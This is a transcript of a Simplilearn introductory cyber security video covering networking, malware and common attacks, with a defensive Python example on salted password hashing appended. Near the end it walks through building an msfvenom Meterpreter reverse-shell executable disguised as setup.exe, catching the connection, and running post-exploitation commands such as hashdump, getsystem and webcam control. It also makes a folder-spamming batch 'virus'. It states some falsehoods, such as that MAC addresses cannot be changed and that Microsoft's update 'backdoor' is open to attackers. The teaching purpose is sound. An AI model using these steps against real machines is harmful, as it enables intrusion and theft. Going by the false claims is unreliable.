Hello, my name is Sargerai, and on behalf of Simplilearn I'd like to welcome you to this tutorial on cyber security training. Let's first understand what cyber security is. Cyber security is the process of using best practices to protect systems, networks and programs from cyber attacks.

A good place to start the discussion is by understanding the motives of cyber criminals. Why do cyber criminals attack? In this example, this vault contains some valuable money, and the second vault also contains some money. Now let us secure vault B with a lock. Between these two vaults, which one do you think the cyber criminal is likely to attack? Well, most definitely vault A, which is unlocked: the cyber criminal would need to put in less effort to attack this unlocked vault.

Let's look at another example. This time vault A is secured with a lock which will now take 5 minutes to unlock, and similarly vault B is also secured with a lock, which will take 15 minutes to unlock. Now again, between these two vaults, which one is the cyber criminal likely to attack? Well, most definitely vault A again, as it will take less time to unlock this vault.

In this third scenario, vault A has 1 million dollars and vault B has 10 million dollars. Now between these two vaults, which one is the cyber criminal most likely to attack? Well, this time the cyber criminal will definitely attack vault B, which contains more money.

Now that we've looked at some examples, let's take a look at what's in it for you in this tutorial. First we'll understand the concept of cyber security. Next we'll discuss the basic terminologies used in cyber security. We'll discuss how the internet works and the basic protocols used on the internet. Understanding common types of attacks is very important for you to be able to protect against them. And lastly, we'll discuss malware, its functions and its sources.

Well, I'm sure you're aware of the buzzword cyber security, but let's understand what cyber security means. Cyber security is
the technology and process of using industry best practices to protect systems, networks and programs from cyber attacks. Cyber security attacks are usually aimed at accessing, changing or destroying sensitive data, extorting money from users, or interrupting normal business processes. Everyone relies on critical infrastructure like power plants, hospitals, public transport systems and financial service companies; securing these and other organizations is essential to keeping our society functioning.

Some people tend to confuse cyber security with information security. They're actually different; their capabilities are different. Information security is another way of saying data security, in other words protecting the confidentiality, integrity and availability of data. This involves the protection of information and information systems from unauthorized access, use, disclosure, disruption, modification or destruction. Information security deals with the protection of information even if it's stored in a file cabinet, while on the other hand cyber security deals with protecting data and information from outside sources in cyberspace, or the internet. So someone could likely be a cyber security expert without being an information security expert, or vice versa.

Here are some of the basic terminologies that you need to be aware of in the world of cyber security. They are: network, internet, internet protocols, IP address, MAC address, DNS, DHCP, router, malware, virus, worms, bots, and finally hash functions and values. We will be discussing these points in detail in the upcoming topics.

Let's start the discussion with understanding what a network is. A computer network is a group of two or more computers connected together so that they can communicate and share data with each other. For example, here there are two computers exchanging data between them, and in this example there are four computers connected to each other. These computers in the network could be sharing resources like a printer or a file server. A
cyber security attack would most likely involve the use of this computer network. The most common resource shared today is the connection to the internet. Now, the internet is a global system of interconnected computer networks that use the internet protocol suite, which is TCP/IP, to link devices worldwide via dedicated routers and servers. When two computers are connected over the internet, they can send and receive a vast range of information resources and services, such as the World Wide Web, email, telephony, video and file sharing. Cyber security primarily deals with attacks originating from the internet.

When two computers are communicating with each other over the internet, they need to be able to understand each other and speak the same language. The data that is being transferred or received cannot just follow any path; to control the flow of data and connectivity, there is a set of rules which are used, known as internet protocols. The protocol used on the internet is commonly known as TCP/IP because the foundational protocols in the suite are the Transmission Control Protocol, which is TCP, and the Internet Protocol, which is IP.

Another important concept to understand is the IP address. An Internet Protocol address, or IP address, is a unique logical address assigned to each device connected to a computer network that uses the Internet Protocol for communication. This unique address is designed to allow one connected computer to communicate with another device over the IP-based network, like the internet. Most IP addresses look like this: 168.194.64.10. An IP address provides an identity to a network device on the internet, similar to a home or business address that supplies a specific physical location with an identifiable address. Devices in the network are differentiated from each other through these IP addresses.

Similar to an IP address is the MAC address, which is a unique hardware identification number that is given to every device that connects on
a network. The Media Access Control, or MAC, addresses are generally assigned by the vendor or the manufacturer of every network card, such as the Ethernet card or the Wi-Fi card. Unlike IP addresses, a MAC address is permanent and therefore cannot be changed. A MAC address is generally 48 bits and written in 12-digit hexadecimal notation. Most MAC addresses look like this: d8 fc 93 c5 a5 e0. This unique MAC address is used to identify the unique device so that data can be delivered to this particular device.

The Domain Name System, or DNS, can be considered the phone book of the internet. We humans use domain names like google.com, which are easy to remember; however, computers only understand an IP address and do not understand a domain name. This is where a DNS server is used to translate a domain name to its corresponding IP address. For example, if you want to browse google.com, type google.com in the browser URL. This request goes to a DNS server. The DNS server finds the IP address of google.com. The DNS server sends the IP address back to the computer, and the computer connects to google.com using the IP address. There are several attacks on the DNS system. A DNS poisoning attack is a type of cyber attack which involves spoofing DNS entries, which can result in a user being diverted from a legitimate server to a fraudulent one.

Not many are aware of the DHCP protocol, the Dynamic Host Configuration Protocol, in short known as DHCP. It is a management protocol that is used to automatically assign an IP address to any device so that they can communicate using the Internet Protocol. DHCP automates and centrally manages these configurations rather than requiring network administrators to manually assign IP addresses to all network devices. Suppose there are these three computers that need IP addresses to communicate on the network. The DHCP server communicates with these computers and automatically assigns them an IP address, along with other network details such as subnet mask
information, default gateway and DNS address. The first system is assigned the IP address 10.0.0.1, the second system is assigned 10.0.0.2 and the third system is assigned 10.0.0.3. You need to be aware that there are several DHCP-related attacks, which include DHCP spoofing and DHCP starvation, which can lead to availability issues.

One of the most important devices that is used in the internet is the router. Well, this router is a networking device that transmits data packets between different networks using a routing protocol. A simple example of a router is the Wi-Fi router device that you probably use at home to connect to the internet. Your local devices can connect to the router, and the router can route the traffic onto the internet, making it possible for you to connect to the internet using your local systems. Router security is a top priority: a security hole in the network can expose you to attackers and put your organization at risk. Most routers provide enough security tools to harden your network against possible cyber attacks, provided that you take the time to configure them to your advantage.

Malware, or malicious software, is any program or file that is intentionally designed to disrupt or damage a computer system. Types of malware can include a wide range of concepts, including viruses, ransomware, worms, trojans, rootkits, keyloggers, adware, spyware, bots, remote access trojans, logic bombs and backdoors. We will discuss some of these malwares in the upcoming topics.

A computer virus is a malware, or a malicious program, which is designed to spread from one system to another through self-replication and to perform any of a wide range of malicious activities. The malicious activities performed by a virus include data deletion, corruption, alteration and exfiltration. An example of a virus is the Melissa virus, which was first detected in 1999; it is a macro virus that was spread through email attachments. The best countermeasure against viruses is an antivirus or anti-malware scanner that is
updated regularly. Another form of malware that is closely related to a virus is a worm. Worms are self-contained applications that don't require a host file or hard drive to infect. Worms typically are focused on replication and distribution rather than on direct damage and destruction. An example is W32.Alcra.F, which is a worm that attempts to propagate through various P2P file sharing networks such as LimeWire. Worms are designed to exploit a specific vulnerability in a system, such as an operating system, protocol, service or application, and then use that flaw to spread themselves to other systems with the same flaw. They may be used to deposit viruses, logic bombs, ransomware, backdoors or bots for botnets, or they may perform direct virus-like activities on their own. Countermeasures for worms are the same as for viruses, with the addition of keeping systems patched.

The term bots, or botnet, is a shortened form of the phrase robot network. It is used to describe a malicious computer program that is used by a hacker to control your system remotely. A botnet is a culmination of traditional DoS attacks into a concept known as a distributed denial of service attack. A botnet can be used to perform any type of malicious activity, although they're most often used to perform distributed denial of service flooding attacks. Botnets can be used to automatically send spam emails, retrieve web pages, change computer settings or perform any other malicious activity. Botnets are possible because most computers around the world are accessible over the internet, and many of those computers have weak security. The best defense against a botnet is to keep your systems patched and hardened.

Hashing is a one-way cryptographic function that takes in an input of any length and produces a fixed-size unique output known as a hash value. A hash value serves as a unique code to detect when the original data source has been altered, since the altered file will produce a different hash value. Passwords should
never be stored in plain text; we should use a hashing function to store passwords. Let's take an example to understand this. Instead of storing the password abc@123 as plain text, a salt value is appended to the plain text password and then the result is hashed. This is referred to as the hashed value. A salt is randomly generated and is unique for each password. Both the salt value and the hashed value are stored together.

In this section we will discuss the common types of attacks, which consist of distributed denial of service, man-in-the-middle attacks, email attacks and password attacks.

Distributed denial of service is a type of attack where multiple compromised systems, which are often infected with bots, are used to target a single system, causing a denial of service attack. In this example, the attacker prepares a botnet controller for the DDoS attack. The attacker uses this botnet controller to compromise the servers. The botnet controller installs a malicious piece of software called bots in the compromised servers. These compromised servers can be referred to as zombie systems. The attacker then remotely controls these servers to attack a victim server, in this example facebook.com. This DDoS attack is intended to temporarily or indefinitely disrupt the services of facebook.com. Now a legitimate user trying to access facebook.com is unable to do so, since all of Facebook's resources are used up in the DDoS attack.

A man-in-the-middle attack is a communications eavesdropping attack. Attackers position themselves in the communication stream between a client and server, or any two communicating entities. The client and server believe that they are communicating directly with each other; they may even have secured or encrypted communication links. However, the attacker can access and potentially modify the communications. One of the most common targets of a man-in-the-middle attack is an online banking site. In this example, a bank customer is communicating with the bank. An attacker sits
between the connection of the two parties and observes the traffic. The hacker first creates a connection with the customer and then creates a connection with the bank. Notice how both the bank and the customer assume that the system they are talking to is the legitimate system: the man in the middle appears to be the bank to the customer, and it appears to be the customer to the bank. In this banking scenario, the hacker could steal the card information, or see that a user is making a transfer and change the destination account number or the amount being sent. Countermeasures to man-in-the-middle attacks include strong encryption protocols and the use of strong authentication.

The combination of username and password is the most common identification and authentication system. At the same time, they are the weakest form; relying solely on a password is not true security. The strength of a password is generally measured in the amount of time and effort involved in breaking the password through various forms of attacks. Password guessing attacks, because of easy-to-guess passwords, are very common against websites and web servers. Some of the common types of password attacks are dictionary attack, brute force attack, keylogger, shoulder surfing and rainbow table attack. Let's understand these attacks in the upcoming topics.

A dictionary attack performs password guessing by using a pre-existing list of possible passwords. Password lists can include millions of possible passwords. Often password lists, or dictionaries, are constructed around topics; thus if an attacker knows basic information about you as a person, they can attempt to exploit human nature's tendency to select passwords using words common or familiar to you. For example, if an attacker knows that you work in the automobile industry, you have dogs and you enjoy traveling, they can select password dictionaries that include words, acronyms and phrases common to those subjects. Dictionary attacks are relatively fast operations, but they have a low
rate of success against targets with knowledge of password security, or whose systems enforce reasonable levels of password length and complexity. A brute force attack is designed to try every possible valid combination of characters to construct possible passwords, starting with single characters and adding characters as it churns through the process, in an attempt to discover the specific password used by the user account. Such attacks are always successful given enough time. Whereas simple and short passwords can be discovered amazingly quickly with a brute force approach, longer and complex passwords can take a long period of time, possibly millions of years of computational time for complex passwords containing 16 or more characters.

A keylogger is a form of malware that records the keystrokes typed into the system's keyboard. This is typically done covertly, so that the person using the keyboard is unaware that their actions are being monitored. The captured keystrokes are then uploaded to the attacker for analysis and exploitation. Keyloggers are most often used for stealing passwords and other confidential information. Many anti-malware scanners include signatures for keyloggers to detect these types of abusive software. A keylogger infection might exhibit sluggish keyboard response, require typing keys twice to get them to be recognized by the system, and cause overall system performance degradation.

Shoulder surfing occurs when someone is able to literally watch over a user's shoulder to view the keyboard or view their display. This could allow them to learn a password or see information that is confidential, private or simply not for their eyes. This is especially effective in crowded places where a person uses a computer, smartphone or ATM. Often shoulder surfing is stopped by dividing worker groups by sensitivity levels, using locked doors, and by not working on sensitive data while in a public space such as a coffee shop or on a plane. A privacy filter screen is also an
effective solution to prevent shoulder surfing attacks. Since the hashing algorithm is not reversible, you might think it is impossible to break a hash; however, there are methods to do so. Rainbow table attacks are a type of attack that attempts to discover the password from the hash. With the rainbow table, all of the following hashes are computed in advance. In other words, you create a series of tables, each having all the possible two-letter, three-letter, four-letter and so forth combinations and the hash of each combination, using a known hashing algorithm like MD5, SHA-1, etc. Now if you search a table for a given hash, the letter combination in the table that produced the hash must be the password that you are seeking.

Social engineering is a form of attack that exploits human nature and human behavior. Social engineering attacks take two primary forms: convincing someone to perform an unauthorized operation, or convincing someone to reveal confidential information. For example, the victim may be fooled into believing that a person on the phone is someone to be respected and trusted, such as a trusted IT professional. In just about every case in social engineering, the attacker tries to convince the victim to perform some activity or reveal a piece of information that they shouldn't, such as their password. The result of a successful attack is information leakage, or the attacker being granted logical or physical access to a secure environment.

Email, or electronic mail, is the most common method of exchanging digital messages on the internet. The first email was sent in 1971, when a computer engineer used the @ symbol to designate the recipient of the email. At its core, an email is simply a text message from one user to another. Advancing technology has added extra features along the way, of course, like image and file attachments, links and embedded maps. When you send and receive email, you use an email client, which allows you to compose and read emails from other computer users. Your email client
can be web-based, meaning you check it through a web browser (examples include Gmail, Office 365 and Zoho), or it can be an application on your computer like Outlook and Thunderbird. When John sends an email to Jack, it appears that the email is sent directly from John's system to Jack's system. However, that is not how email really works; it is much more complex than that. This is how an email really works: it involves several mail servers along with DNS servers. After John's SMTP client establishes a reliable communication channel to the SMTP server, the session is opened with a greeting by the server, usually containing its fully qualified domain name, in this case smtp.source.com. The mail server approaches the DNS server to resolve the MX record. The DNS server replies with the resolved IP address of the destination server. The source mail server is now able to establish reliable communication with the destination SMTP mail server, and now Jack is able to receive the email in his email client using the POP3 or IMAP protocols.

Let's understand the types of email attacks. Phishing is one of the most common attacks, and there are also spoofing and email attachments. Let's understand these attacks in a little more detail. Phishing is a form of social engineering attack focused on stealing credentials or identity information from any potential target. It is based on the concept of fishing for information. A phishing attack is used to obtain sensitive information such as usernames, passwords, credit card details or other personally identifiable information by masquerading as a trustworthy entity, for example a bank, a service provider or a merchant. A phishing attack generally involves an email to encourage people to share their details. In this example, Brian receives a fake email which mentions that his ABC Bank account was going to expire today, creating a sense of urgency. How does Brian find out that it was spam? Well, Brian does not have an ABC Bank account. But what if someone actually had an account with ABC Bank? It
is quite likely that the person would click on the given link and become a victim of the phishing attack. Well, it is important to note that banks do not send emails like this; you should choose to ignore this email or report the matter to your bank immediately.

Email spoofing refers to an email with a forged sender address, to make it look as if it came from some legitimate user. This is a common technique used by phishing attacks, spam and malware to make their emails appear to be coming from legitimate sources such as governmental authorities, insurance companies and banks. In this example, Bill receives a spoofed email from his manager asking him to share his password. Well, it is quite likely that Bill may share his password if he's unaware of the email being spoofed. As a good security practice, never share your password over email, or for that matter, never ever share your password with anyone.

While email attachments are a convenient way to send files like images, documents, audio or videos, they can be misused to share something which is malicious. Attackers might send you spoofed emails, such as invoices, encouraging you to download and open the file. Most malware email attachments include code or exploits to cause your computer to download more malware from the internet. These email attachments are often small, customized and not widely spread, making them hard to detect by antivirus software. In recent years, email malware is often used to drop ransomware, which can delete or encrypt your files and backups, even if they are stored in the cloud or on a server.

Malware, or malicious code, is any element of software that performs an unwanted function from the perspective of the legitimate user or owner of a computer system. Malware is big business: not only are there hundreds of millions of malware families and variants in the world and an unknown number of programmers developing the malware, there are also at least dozens of companies developing anti-malware solutions. The developers
who are working on writing malware are getting paid to write the software, anticipating selling this malware, or expect to make money from the malware operations. Going through the different types of malware, you will start to understand the complexity of the landscape today; this includes the functions of malware as well as its users.

Malware has been known to overwhelm system resources. A good example is that of a worm, which is a self-contained application that typically is focused on replication and distribution rather than on direct damage and destruction. It functions as a standalone piece of software, in that it can spread without intervention by another program, and it focuses on spreading from an infected system to as many unaffected systems as possible. A worm infection may display symptoms that include a slow-to-respond system, applications that no longer will execute, a lack of free space on storage devices, CPU and memory utilization maxed out at 100%, system crashes, and abnormal network activity. This results in a denial of service attack.

Some malware can create backdoors, compromising the system's security. A backdoor is a malware which allows a hacker to remotely access your system. These small, maliciously purposed tools can easily be deposited on a computer through a trojan horse, a virus, a worm, a website mobile code download, or even as part of an intrusion activity. Once active on a system, the tool opens access ports and waits for an inbound connection; thus a backdoor serves as an access portal for hackers so that they can bypass any security restrictions and gain access to a system. For example, Microsoft has a backdoor which is used to update the patches periodically; it is possible for an attacker to use this backdoor to attack the system remotely.

Some malware, such as a retrovirus, is known to disable security functions. Retroviruses are specifically targeted at antivirus systems to render them useless. You can consider a retrovirus to be an anti-antivirus.
Retroviruses can directly attack your antivirus software and potentially destroy your virus definition database file. Destroying this information without your knowledge would leave you with a false sense of security. The virus may also directly attack an antivirus program to create a bypass for itself.

As discussed earlier, malware can be used to create botnets for a DDoS attack. Botnets are either directly or indirectly controlled by a hacker. A botnet can be used to perform any type of malicious activity, although they are most often used to perform denial of service flooding attacks. Botnets can send hundreds of millions of requests to a website, causing the website to crash and be unavailable for legitimate users. The best defense against a botnet is to keep your systems patched and hardened, and not to become the host of a botnet agent.

Malware is often copied from one location to another using various methods. Removable media such as USB pen drives are a major source of malware; it is generally a good practice to disable the use of such removable media, to protect not only against malware but also against theft of confidential data. Documents and executable files can be used to spread malware across systems; generally it's a good practice to not allow normal users the ability to install executable files on their system. The internet is the source of millions of malicious files that can be easily downloaded and can infect systems; a firewall rule should be configured to prevent the download of such malicious files. Several malwares, such as worms, can easily spread across network connections; a system infected with a worm must immediately be disconnected from the network to prevent it from infecting other systems in the network. As discussed earlier, email attachments could contain malicious links or files; always be cautious of any attachments and scan them before downloading.

If the primary purpose of the malware application is to deliver ads, then it is classified as adware. The
primary purpose of adware is to display malicious ads and generate revenue for the creator, so such malware is designed to display pop-ups over legitimate content. These pop-ups could contain malicious links, and some of them could contain phishing content which is difficult to detect. As these new threats have developed, so too have some excellent programs for countering them. Keep your updates current, because this is where most of the corrections for security problems are implemented.

In this demo you will learn how to create and deploy a virus using the Metasploit framework. We will use the msfvenom command available in Kali Linux to create a standalone binary that will create a reverse Meterpreter shell back to us. The -p option specifies the payload to use, which in this demo is the Windows Meterpreter. Meterpreter allows an attacker to control a victim's computer by running an invisible shell and establishing a communication channel back to the attacking machine. The LHOST option should be used to specify your IP address, which in this case is 192.168.41.129. The LPORT option should be the port you wish to be connected back on, which in this case is 4444. -f specifies the output format, which in this case is exe. -a specifies the architecture to use. Save the file as setup.exe. Press enter and give it a moment to generate the payload. Wonderful, the exe file with the payload is now generated.

Now let's run the msfconsole command; this will start the Metasploit framework console. Use the exploit multi handler to handle the exploit. Set the payload to Windows Meterpreter reverse TCP; reverse TCP is used to get the signal from the host. Set LHOST to your IP address (here you set your own IP address). Set LPORT to 4444; set any port that you want, not a standard port like HTTP, which uses port 80.
Type exploit and wait for the victim to click on the setup file. After this, copy the virus folder onto the pen drive and paste it into Windows; then run the file on the Windows system, and you will see that the reverse TCP handler will get the details of the computer where the file was executed. Here are the commands: ls lists the files on the victim's system; pwd displays the current directory; sysinfo gets the system information; help gets all the commands related to the present directory. There are the timestamp commands, the password database command hashdump, and the privilege escalation command getsystem. Here are the webcam commands to control the webcam; these are the various options available. Back in the Windows system, open up some files: this is the bank credentials file and your very sensitive passwords file. Then back in your Kali Linux, type the screenshot command, and this will save the screenshot on your system. Let's open the file, and now you can see that the very sensitive file is now being displayed here in the screenshot. I hope you enjoyed the demo.

This demo will show you how to create an unlimited new folder virus. Type this code in Notepad; this creates an infinite loop to create random folders. Save it as a .bat file; a .bat file means that it will execute in the command prompt. Create a folder called documents and place the file.bat inside this folder. Now run the file where you want and it will start creating unlimited folders. You can press Ctrl+C to terminate this command; type Y to terminate this batch job. You can see that there are thousands of folders that have been created. Click on this folder and you can see that these folders are all empty. Hope you like the demo.
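The transcript describes hashing in two places: the hash value used to detect that a file has been altered, and the salted password hash that is stored instead of the plain text abc@123, which is also why a precomputed rainbow table of plain hashes stops working. The following is an added worked example that is not part of the Simplilearn tutorial. It is my own code, and it assumes PBKDF2-HMAC-SHA256 as the password hashing function (the transcript only says "a hashing function"); the two "files" and the abc@123 password are constructed sample inputs, and the precomputed table is a plain hash-to-password dictionary, a simplification of a real rainbow table that is enough to show why salting defeats it.

```python
import hashlib
import hmac
import itertools
import os
import string
from typing import Dict, Optional, Tuple

# Constructed sample "files" (byte strings standing in for files on disk).
ORIGINAL = b"account=alice;balance=100\n"
TAMPERED = b"account=alice;balance=1000\n"

PBKDF2_ITERATIONS = 100_000  # assumption: a moderate work factor for the example


def file_hash(data: bytes) -> str:
    """Return the SHA-256 hash of the data as a 64-character hex string."""
    return hashlib.sha256(data).hexdigest()


def verify_integrity(data: bytes, known_hash: str) -> bool:
    """True only if the data still produces the hash recorded earlier.

    Any change to the file, even one character, yields a different hash,
    which is how a hash value detects that the original data was altered.
    compare_digest avoids leaking timing information on the comparison.
    """
    return hmac.compare_digest(file_hash(data), known_hash)


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> Tuple[bytes, bytes]:
    """Salt the password and hash it; returns (salt, hash) to be stored together.

    A fresh random salt is generated for every password, so the same password
    stored twice produces two different hashes.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, stored_hash: bytes,
                    iterations: int = PBKDF2_ITERATIONS) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt, iterations)
    return hmac.compare_digest(candidate, stored_hash)


def salts_differ(password: str) -> bool:
    """Store the same password twice; both salts and both hashes must differ."""
    salt1, hash1 = hash_password(password)
    salt2, hash2 = hash_password(password)
    return salt1 != salt2 and hash1 != hash2


def build_table(max_len: int = 2) -> Dict[str, str]:
    """Precompute hash -> password for every lowercase combination up to max_len.

    This is the idea behind the rainbow table in the transcript, reduced to a
    plain lookup table: the work is done once, in advance, for unsalted hashes.
    """
    table: Dict[str, str] = {}
    for length in range(1, max_len + 1):
        for combo in itertools.product(string.ascii_lowercase, repeat=length):
            candidate = "".join(combo)
            table[file_hash(candidate.encode("utf-8"))] = candidate
    return table


def table_lookup(table: Dict[str, str], hash_hex: str) -> Optional[str]:
    """Return the password that produced hash_hex, or None if it is not in the table."""
    return table.get(hash_hex)


if __name__ == "__main__":
    recorded = file_hash(ORIGINAL)
    print("original intact:", verify_integrity(ORIGINAL, recorded))
    print("tampered intact:", verify_integrity(TAMPERED, recorded))

    salt, stored = hash_password("abc@123")
    print("correct password accepted:", verify_password("abc@123", salt, stored))
    print("wrong password rejected:", not verify_password("abc@124", salt, stored))

    table = build_table(2)
    print("unsalted 'ab' found in table:", table_lookup(table, file_hash(b"ab")))
    salted_salt, salted = hash_password("ab")
    print("salted 'ab' found in table:", table_lookup(table, salted.hex()))
```

The unsalted lookup succeeds because every two-letter hash was computed in advance; the salted lookup fails because the attacker would need a separate table for each random salt, which is the point the transcript makes about storing the salt and hash together.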